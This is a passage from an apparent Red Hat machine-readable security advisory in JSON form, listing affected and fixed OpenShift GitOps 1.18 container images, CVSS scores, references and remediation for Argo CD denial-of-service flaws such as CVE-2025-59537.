"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:bd3eb63c087dbd5f807b9e7cf680c0de1c3408dd9f12b7eb6e98f8221ca28a8f_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:e2fdaac8c55eefe25f63c0742f8bd14066abb33b7a5f746157fad65b5b99d092_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:049800b51d49a8f5320ed013eea46695eb7f0eeee26459f18a51f5d1023e6a8c_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:05de1e5e8aeb9bbaab90f03fd3cf1746bc79053de779c45ab850f5592f29e094_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:9c79c05230debdba71ef6cefc26e39b0a5134fbe00aad9ce667c277aa8e34228_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:a424e822277befdf5d414c5aa5e1f5e359d56c5e9fc5da02e451a59244559966_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "argocd: argocd-server: gitops: Unauthenticated argocd-server panic via a malicious Bitbucket-Server webhook payload"
},
{
"cve": "CVE-2025-59537",
"cwe": {
"id": "CWE-476",
"name": "NULL Pointer Dereference"
},
"discovery_date": "2025-10-01T22:00:51.264122+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:5fb796a21d73e4baf25c8a116c69447ef0d5de6db86b0e3b65df68373f4b10d0_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:82b5c2760800ab618b4d1fbd7e713765181f57123636ecb34d0f700af5b64945_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:e9197abd503e4a97ef55984334e4d0de594d3b9a5e542bbe475322f966b8fefd_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:f8f99349426e5ab977acdda440c22e5d04187ca43e05f91c8b5bbb823eaf59f6_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:2cfd5c1921d34fe92c312d0929599207266c0b14207b987edda7eb838728e554_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:2fa4d567a4de620a81f1678596b74fa9bcb3dd060e71549917e819ef4b5a80f0_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:3a250c6cf16f5676d412f11d48ca6e84f5681c899ed75c8248e6dd0184bdcc5d_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:d2d1a76ff456e08e2b217aa01530b7f6b9fb91c40388cee14c0df77245ac5789_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:67069d6db9ef08a8653964aa24a13a97da97f2238210dbdb085988014f77e990_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:a5bd0b0d1677ffc3b4117082a91588316d5f4cefba1265051cbad07856f99969_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:d9b83dd9c9a3a76315a830cb1e995964e697dc025b1d552d1e5bf6acd94f7186_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:f988a63f8f11e2cbfef19c9d02905a69daf783ac05e6e9c042f13c697e87479a_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:22f95edd885609dfbf1b606fc5d41f2efa5361cbec1f1918e5d774a030779ea0_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:94793fe05dede5787dacf889f6e51e9385d3b312e7500514f88ea6fa608b0089_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:dafab1379d8bf3af9d2794a5d249901a4d045b7ee1e129669001b922ccdc9f98_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:df33bf847baaeff2432a5e2e22853a89cd15fd8a3f14cabc233b38d3e9dcacc4_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:7f9756472d19ba870990b7348cd693dc850d333ae2202d56dbdf9d7dd0ff01bb_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:cc6ca27fa4823083354c3879efb3a2733f377965528fda892cf1aa7823cc35ea_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:eb5cfcb3d2da257dcac23086cdef0e16487885c14badf5577f36c22b6e9a7d43_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:f20831b8df3104e7ae3e147ea3df202433d0f20e6b1bfb1259fe71bae8f9c2b5_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:702e2376cbe077fd68686ab54f25be3d2b87696b1cf956c48465f609b97fff8e_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:87bcc0a5bc2f67d609161d346d3fee760b292db0dac42ef7393dad2054700257_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:a2d7c119c287bc7ab8751d4435b7e80749618abf4d98a2704a3f786d239dc86d_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:b756f5cd7270e033a99c1c90c7e63567ee88f40f41764bf35573528d8a275eae_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b0369e0bddef1a52941482bfbe88f72674de51dfcc7f30ddb98b410476ae4785_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b8f986a933e626883b0bf03fdf253ce4c74d82931342ede909324de1da1ae327_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:bd3eb63c087dbd5f807b9e7cf680c0de1c3408dd9f12b7eb6e98f8221ca28a8f_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:e2fdaac8c55eefe25f63c0742f8bd14066abb33b7a5f746157fad65b5b99d092_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:049800b51d49a8f5320ed013eea46695eb7f0eeee26459f18a51f5d1023e6a8c_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:05de1e5e8aeb9bbaab90f03fd3cf1746bc79053de779c45ab850f5592f29e094_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:9c79c05230debdba71ef6cefc26e39b0a5134fbe00aad9ce667c277aa8e34228_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:a424e822277befdf5d414c5aa5e1f5e359d56c5e9fc5da02e451a59244559966_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2400938"
}
],
"notes": [
{
"category": "description",
"text": "Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. Versions 1.2.0 through 1.8.7, 2.0.0-rc1 through 2.14.19, 3.0.0-rc1 through 3.2.0-rc1, 3.1.7 and 3.0.18 are vulnerable to malicious API requests which can crash the API server and cause denial of service to legitimate clients. With the default configuration, no webhook.gogs.secret set, Argo CD\u2019s /api/webhook endpoint will crash the entire argocd-server process when it receives a Gogs push event whose JSON field commits[].repo is not set or is null. This issue is fixed in versions 2.14.20, 3.2.0-rc2, 3.1.8 and 3.0.19.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "github.com/argoproj/argo-cd: Argo CD unauthenticated Denial of Service",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The availability risk of this vulnerability is limited to the Argo-CD application. General host availability is not at risk.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:1d6f9b5cdf776ef51e96e738f726d3dd797304ab44bc313ded7a6d280fe12a95_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:73cbdb023ab9abf39602b4a15f9a68515aad37c14a1bbff060b906570ab9d2c3_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:b0408f958ef20c3f6230d392049b261ebfbd50f5f8e5b0e9776b20726fc9c83a_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:cc5b889fa32b5476f29a9d36eb28de80c4288cbf366e86a3aa82fb4a6993b63b_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:2cb3b46616a69b95620a59b43e9aadbe02e98b984434d1a47410a603de4d1598_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:d84d629b8e7e99fca60a227053ea4aae2ada53e1720ad928ebc627465e99b9a8_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:e03a5803646011ab083c958f52f8f9d7c8025572e95f522768d260961c72469c_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:e7561d1e7e220cca0cabb9e28a7a9594a1cebf771546382e6302c98a79d82e7e_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:a27b8dd047e10fbbd6fc49176036c9b5178a1d2841e26719bfde23239ede157d_amd64"
],
"known_not_affected": [
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:5fb796a21d73e4baf25c8a116c69447ef0d5de6db86b0e3b65df68373f4b10d0_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:82b5c2760800ab618b4d1fbd7e713765181f57123636ecb34d0f700af5b64945_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:e9197abd503e4a97ef55984334e4d0de594d3b9a5e542bbe475322f966b8fefd_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:f8f99349426e5ab977acdda440c22e5d04187ca43e05f91c8b5bbb823eaf59f6_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:2cfd5c1921d34fe92c312d0929599207266c0b14207b987edda7eb838728e554_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:2fa4d567a4de620a81f1678596b74fa9bcb3dd060e71549917e819ef4b5a80f0_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:3a250c6cf16f5676d412f11d48ca6e84f5681c899ed75c8248e6dd0184bdcc5d_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:d2d1a76ff456e08e2b217aa01530b7f6b9fb91c40388cee14c0df77245ac5789_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:67069d6db9ef08a8653964aa24a13a97da97f2238210dbdb085988014f77e990_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:a5bd0b0d1677ffc3b4117082a91588316d5f4cefba1265051cbad07856f99969_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:d9b83dd9c9a3a76315a830cb1e995964e697dc025b1d552d1e5bf6acd94f7186_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:f988a63f8f11e2cbfef19c9d02905a69daf783ac05e6e9c042f13c697e87479a_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:22f95edd885609dfbf1b606fc5d41f2efa5361cbec1f1918e5d774a030779ea0_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:94793fe05dede5787dacf889f6e51e9385d3b312e7500514f88ea6fa608b0089_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:dafab1379d8bf3af9d2794a5d249901a4d045b7ee1e129669001b922ccdc9f98_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:df33bf847baaeff2432a5e2e22853a89cd15fd8a3f14cabc233b38d3e9dcacc4_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:7f9756472d19ba870990b7348cd693dc850d333ae2202d56dbdf9d7dd0ff01bb_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:cc6ca27fa4823083354c3879efb3a2733f377965528fda892cf1aa7823cc35ea_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:eb5cfcb3d2da257dcac23086cdef0e16487885c14badf5577f36c22b6e9a7d43_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:f20831b8df3104e7ae3e147ea3df202433d0f20e6b1bfb1259fe71bae8f9c2b5_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:702e2376cbe077fd68686ab54f25be3d2b87696b1cf956c48465f609b97fff8e_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:87bcc0a5bc2f67d609161d346d3fee760b292db0dac42ef7393dad2054700257_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:a2d7c119c287bc7ab8751d4435b7e80749618abf4d98a2704a3f786d239dc86d_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:b756f5cd7270e033a99c1c90c7e63567ee88f40f41764bf35573528d8a275eae_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b0369e0bddef1a52941482bfbe88f72674de51dfcc7f30ddb98b410476ae4785_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b8f986a933e626883b0bf03fdf253ce4c74d82931342ede909324de1da1ae327_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:bd3eb63c087dbd5f807b9e7cf680c0de1c3408dd9f12b7eb6e98f8221ca28a8f_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:e2fdaac8c55eefe25f63c0742f8bd14066abb33b7a5f746157fad65b5b99d092_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:049800b51d49a8f5320ed013eea46695eb7f0eeee26459f18a51f5d1023e6a8c_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:05de1e5e8aeb9bbaab90f03fd3cf1746bc79053de779c45ab850f5592f29e094_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:9c79c05230debdba71ef6cefc26e39b0a5134fbe00aad9ce667c277aa8e34228_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:a424e822277befdf5d414c5aa5e1f5e359d56c5e9fc5da02e451a59244559966_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-59537"
},
{
"category": "external",
"summary": "RHBZ#2400938",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2400938"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-59537",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-59537"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-59537",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59537"
},
{
"category": "external",
"summary": "https://github.com/argoproj/argo-cd/commit/761fc27068d2d4cd24e1f784eb2a9033b5ee7f43",
"url": "https://github.com/argoproj/argo-cd/commit/761fc27068d2d4cd24e1f784eb2a9033b5ee7f43"
},
{
"category": "external",
"summary": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-wp4p-9pxh-cgx2",
"url": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-wp4p-9pxh-cgx2"
}
],
"release_date": "2025-10-01T21:01:36.519000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-10-15T10:27:05+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:1d6f9b5cdf776ef51e96e738f726d3dd797304ab44bc313ded7a6d280fe12a95_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:73cbdb023ab9abf39602b4a15f9a68515aad37c14a1bbff060b906570ab9d2c3_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:b0408f958ef20c3f6230d392049b261ebfbd50f5f8e5b0e9776b20726fc9c83a_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:cc5b889fa32b5476f29a9d36eb28de80c4288cbf366e86a3aa82fb4a6993b63b_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:2cb3b46616a69b95620a59b43e9aadbe02e98b984434d1a47410a603de4d1598_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:d84d629b8e7e99fca60a227053ea4aae2ada53e1720ad928ebc627465e99b9a8_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:e03a5803646011ab083c958f52f8f9d7c8025572e95f522768d260961c72469c_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:e7561d1e7e220cca0cabb9e28a7a9594a1cebf771546382e6302c98a79d82e7e_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:a27b8dd047e10fbbd6fc49176036c9b5178a1d2841e26719bfde23239ede157d_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:18093"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:5fb796a21d73e4baf25c8a116c69447ef0d5de6db86b0e3b65df68373f4b10d0_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:82b5c2760800ab618b4d1fbd7e713765181f57123636ecb34d0f700af5b64945_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:e9197abd503e4a97ef55984334e4d0de594d3b9a5e542bbe475322f966b8fefd_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:f8f99349426e5ab977acdda440c22e5d04187ca43e05f91c8b5bbb823eaf59f6_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:2cfd5c1921d34fe92c312d0929599207266c0b14207b987edda7eb838728e554_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:2fa4d567a4de620a81f1678596b74fa9bcb3dd060e71549917e819ef4b5a80f0_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:3a250c6cf16f5676d412f11d48ca6e84f5681c899ed75c8248e6dd0184bdcc5d_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:d2d1a76ff456e08e2b217aa01530b7f6b9fb91c40388cee14c0df77245ac5789_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:67069d6db9ef08a8653964aa24a13a97da97f2238210dbdb085988014f77e990_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:a5bd0b0d1677ffc3b4117082a91588316d5f4cefba1265051cbad07856f99969_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:d9b83dd9c9a3a76315a830cb1e995964e697dc025b1d552d1e5bf6acd94f7186_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:f988a63f8f11e2cbfef19c9d02905a69daf783ac05e6e9c042f13c697e87479a_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:1d6f9b5cdf776ef51e96e738f726d3dd797304ab44bc313ded7a6d280fe12a95_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:73cbdb023ab9abf39602b4a15f9a68515aad37c14a1bbff060b906570ab9d2c3_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:b0408f958ef20c3f6230d392049b261ebfbd50f5f8e5b0e9776b20726fc9c83a_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:cc5b889fa32b5476f29a9d36eb28de80c4288cbf366e86a3aa82fb4a6993b63b_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:2cb3b46616a69b95620a59b43e9aadbe02e98b984434d1a47410a603de4d1598_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:d84d629b8e7e99fca60a227053ea4aae2ada53e1720ad928ebc627465e99b9a8_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:e03a5803646011ab083c958f52f8f9d7c8025572e95f522768d260961c72469c_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:e7561d1e7e220cca0cabb9e28a7a9594a1cebf771546382e6302c98a79d82e7e_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:22f95edd885609dfbf1b606fc5d41f2efa5361cbec1f1918e5d774a030779ea0_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:94793fe05dede5787dacf889f6e51e9385d3b312e7500514f88ea6fa608b0089_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:dafab1379d8bf3af9d2794a5d249901a4d045b7ee1e129669001b922ccdc9f98_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:df33bf847baaeff2432a5e2e22853a89cd15fd8a3f14cabc233b38d3e9dcacc4_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:7f9756472d19ba870990b7348cd693dc850d333ae2202d56dbdf9d7dd0ff01bb_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:cc6ca27fa4823083354c3879efb3a2733f377965528fda892cf1aa7823cc35ea_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:eb5cfcb3d2da257dcac23086cdef0e16487885c14badf5577f36c22b6e9a7d43_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:f20831b8df3104e7ae3e147ea3df202433d0f20e6b1bfb1259fe71bae8f9c2b5_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:a27b8dd047e10fbbd6fc49176036c9b5178a1d2841e26719bfde23239ede157d_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:702e2376cbe077fd68686ab54f25be3d2b87696b1cf956c48465f609b97fff8e_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:87bcc0a5bc2f67d609161d346d3fee760b292db0dac42ef7393dad2054700257_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:a2d7c119c287bc7ab8751d4435b7e80749618abf4d98a2704a3f786d239dc86d_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:b756f5cd7270e033a99c1c90c7e63567ee88f40f41764bf35573528d8a275eae_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b0369e0bddef1a52941482bfbe88f72674de51dfcc7f30ddb98b410476ae4785_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b8f986a933e626883b0bf03fdf253ce4c74d82931342ede909324de1da1ae327_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:bd3eb63c087dbd5f807b9e7cf680c0de1c3408dd9f12b7eb6e98f8221ca28a8f_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:e2fdaac8c55eefe25f63c0742f8bd14066abb33b7a5f746157fad65b5b99d092_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:049800b51d49a8f5320ed013eea46695eb7f0eeee26459f18a51f5d1023e6a8c_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:05de1e5e8aeb9bbaab90f03fd3cf1746bc79053de779c45ab850f5592f29e094_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:9c79c05230debdba71ef6cefc26e39b0a5134fbe00aad9ce667c277aa8e34228_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:a424e822277befdf5d414c5aa5e1f5e359d56c5e9fc5da02e451a59244559966_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
